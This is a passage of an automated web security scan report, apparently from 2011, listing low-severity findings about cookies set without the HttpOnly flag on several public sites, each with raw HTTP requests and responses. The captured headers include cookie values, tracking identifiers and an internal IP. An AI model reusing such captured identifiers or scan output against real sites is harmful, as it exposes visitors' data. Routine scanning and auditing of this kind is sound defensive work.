...[SNIP]...

17.460. http://www.hoovers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.hoovers.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; BIGipServerholpriv-colo1=1342243082.20480.0000; BIGipServerwww-1=1341968906.20480.0000; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:54:56 GMT
Server: Apache
Last-Modified: Fri, 09 Oct 2009 00:43:07 GMT
ETag: "e36"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerhaspriv-colo1=251384330.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"

...[SNIP]...

17.461. http://www.interactivedata-rts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivedata-rts.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.interactivedata-rts.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kdk23kds=m0cul2o9mqitm9hr94f71kgc03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

17.462. http://www.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.live.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.live.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; LD=3871a7c5-0acf-46b1-b76d-faebaecf0536_00d7c3a81b1_15501_1294800676304=L5708&3871a7c5-0acf-46b1-b76d-faebaecf0536_00e1e3469a5_15501_1294800680668=L3088|U46904782&3871a7c5-0acf-46b1-b76d-faebaecf0536_00ea893c9b1_15501_1294800680555=L3271~sw:1920~sh:1200~c:16~bw:1142~bh:750&3871a7c5-0acf-46b1-b76d-faebaecf0536_00a12627c20_15501_1294800670164=U46914446&3871a7c5-0acf-46b1-b76d-faebaecf0536_004401fc3dc_15501_1294800633344=U46951808&3871a7c5-0acf-46b1-b76d-faebaecf0536_00b4d7765d1_15501_1294800671751=U46913589

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.www.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:28:44 GMT; path=/
Set-Cookie: E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 05-Feb-2011 23:08:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:08:44 GMT
Content-Length: 345

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296342524&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

17.463. http://www.microsoft.com/web/gallery/install.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /web/gallery/install.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/gallery/install.aspx HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 4.0.30319
Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
VTag: 279537540800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:30:55 GMT
Content-Length: 74237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head
...[SNIP]...

17.464. http://www.morningstar.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.morningstar.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.morningstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: private
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /IntroPage.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:54:03 GMT
Connection: close
Set-Cookie: fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
Set-Cookie: IntroAd=true; domain=morningstar.com; expires=Sun, 30-Jan-2011 19:54:03 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fIntroPage.aspx">here</a>.</h2>
</body></html>

17.465. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher
Host: www.redacted

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA39
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.redacted; expires=Tue, 01-Feb-2011 23:26:28 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 86107
Content-Length: 86107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

17.466. http://www.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 208222

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296345219=new Image();
req_108_1296345219.src='/__ssobj/ard.png?5567760320082216653_1_0-108-'+(11527*112461
...[SNIP]...

17.467. http://www.msnbc.redacted/id/8004316/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 01:57:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 165444

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296352676=new Image();
req_108_1296352676.src='/__ssobj/ard.png?5567792347586920986_1_0-108-'+(26891*48207+
...[SNIP]...

17.468. http://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:13:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

17.469. http://www.newsvine.com/_action/article/emailThis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/article/emailThis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Connection: close

[]

17.470. http://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F412586518
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


17.471. http://www.newsvine.com/_action/user/startTracking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/startTracking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

17.472. http://www.newsvine.com/_action/user/stopTracking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/user/stopTracking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

17.473. http://www.newsvine.com/_api/comments/getComments

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/comments/getComments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/comments/getComments HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:32 GMT
Content-Length: 65
Content-Type: application/json
Connection: close

           
{"response":{"article":[{"contentId":-1,"totalComments":0}]}}

17.474. http://www.newsvine.com/_api/question/getUserData

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/question/getUserData

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_api/question/getUserData HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com
Set-Cookie: sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:30 GMT
Content-Length: 244
Content-Type: application/json
Connection: close

           
{"response":{"user":{"domainName":"","displayName":"","state":"0","zip":"","city":"Washington, DC","country":"United States","url":"http:\/\/www.newsvine.com","avatar":"http:\/\/www.polls.newsvine
...[SNIP]...

17.475. http://www.newsvine.com/_api/user/convTracker

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_api/user/convTracker

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/user/convTracker HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:37 GMT
Content-Length: 304
Content-Type: application/json
Connection: close

{"tracker":{"a":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage":5}},"t":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage
...[SNIP]...

17.476. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_nv/accounts/newsvine/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:13:08 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/newsvine/emailAlerts
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


17.477. http://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:26 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/api/accounts/login
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


17.478. http://www.newsvine.com/_tools/user/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 17589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.479. http://www.newsvine.com/_vine/js/m1/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_vine/js/m1/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_vine/js/m1/global.js?v=23247 HTTP/1.1
Host: www.newsvine.com
